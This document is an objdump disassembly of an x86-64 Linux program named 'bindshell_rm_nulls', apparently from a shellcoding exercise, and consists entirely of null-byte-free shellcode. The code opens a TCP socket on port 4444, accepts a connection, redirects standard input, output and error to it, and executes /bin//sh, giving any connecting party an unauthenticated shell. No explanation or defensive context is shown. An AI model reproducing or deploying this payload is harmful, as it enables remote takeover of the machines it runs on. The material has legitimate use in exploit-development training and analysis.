$ objdump -d -M intel bindshell_rm_nulls 

bindshell_rm_nulls:     file format elf64-x86-64


Disassembly of section .text:

0000000000400080 <_start>:
  400080:       48 31 c0                xor    rax,rax
  400083:       b0 29                   mov    al,0x29
  400085:       48 31 ff                xor    rdi,rdi
  400088:       ff c7                   inc    edi
  40008a:       ff c7                   inc    edi
  40008c:       48 31 f6                xor    rsi,rsi
  40008f:       48 ff c6                inc    rsi
  400092:       48 31 d2                xor    rdx,rdx
  400095:       0f 05                   syscall
  400097:       48 89 c7                mov    rdi,rax
  40009a:       48 31 c0                xor    rax,rax
  40009d:       50                      push   rax
  40009e:       89 44 24 fc             mov    DWORD PTR [rsp-0x4],eax
  4000a2:       66 c7 44 24 fa 11 5c    mov    WORD PTR [rsp-0x6],0x5c11
  4000a9:       66 c7 44 24 f8 ff ff    mov    WORD PTR [rsp-0x8],0xffff
  4000b0:       66 83 44 24 f8 03       add    WORD PTR [rsp-0x8],0x3
  4000b6:       48 83 ec 08             sub    rsp,0x8
  4000ba:       48 31 c0                xor    rax,rax
  4000bd:       b0 31                   mov    al,0x31
  4000bf:       48 89 e6                mov    rsi,rsp
  4000c2:       48 31 d2                xor    rdx,rdx
  4000c5:       b2 10                   mov    dl,0x10
  4000c7:       0f 05                   syscall
  4000c9:       48 31 c0                xor    rax,rax
  4000cc:       b0 32                   mov    al,0x32
  4000ce:       48 c7 c6 ff ff ff ff    mov    rsi,0xffffffffffffffff
  4000d5:       48 83 c6 03             add    rsi,0x3
  4000d9:       0f 05                   syscall
  4000db:       48 31 c0                xor    rax,rax
  4000de:       b0 2b                   mov    al,0x2b
  4000e0:       48 83 ec 10             sub    rsp,0x10
  4000e4:       48 89 e6                mov    rsi,rsp
  4000e7:       c6 44 24 ff 10          mov    BYTE PTR [rsp-0x1],0x10
  4000ec:       48 83 ec 01             sub    rsp,0x1
  4000f0:       48 89 e2                mov    rdx,rsp
  4000f3:       0f 05                   syscall
  4000f5:       49 89 c1                mov    r9,rax
  4000f8:       48 31 c0                xor    rax,rax
  4000fb:       b0 03                   mov    al,0x3
  4000fd:       0f 05                   syscall
  4000ff:       4c 89 cf                mov    rdi,r9
  400102:       48 31 c0                xor    rax,rax
  400105:       b0 21                   mov    al,0x21
  400107:       48 31 f6                xor    rsi,rsi
  40010a:       0f 05                   syscall
  40010c:       48 31 c0                xor    rax,rax
  40010f:       b0 21                   mov    al,0x21
  400111:       48 31 f6                xor    rsi,rsi
  400114:       48 ff c6                inc    rsi
  400117:       0f 05                   syscall
  400119:       48 31 c0                xor    rax,rax
  40011c:       b0 21                   mov    al,0x21
  40011e:       48 c7 c6 ff ff ff ff    mov    rsi,0xffffffffffffffff
  400125:       48 83 c6 03             add    rsi,0x3
  400129:       0f 05                   syscall
  40012b:       48 31 c0                xor    rax,rax
  40012e:       50                      push   rax
  40012f:       48 bb 2f 62 69 6e 2f    movabs rbx,0x68732f2f6e69622f
  400136:       2f 73 68
  400139:       53                      push   rbx
  40013a:       48 89 e7                mov    rdi,rsp
  40013d:       50                      push   rax
  40013e:       48 89 e2                mov    rdx,rsp
  400141:       57                      push   rdi
  400142:       48 89 e6                mov    rsi,rsp
  400145:       48 83 c0 3b             add    rax,0x3b
  400149:       0f 05                   syscall
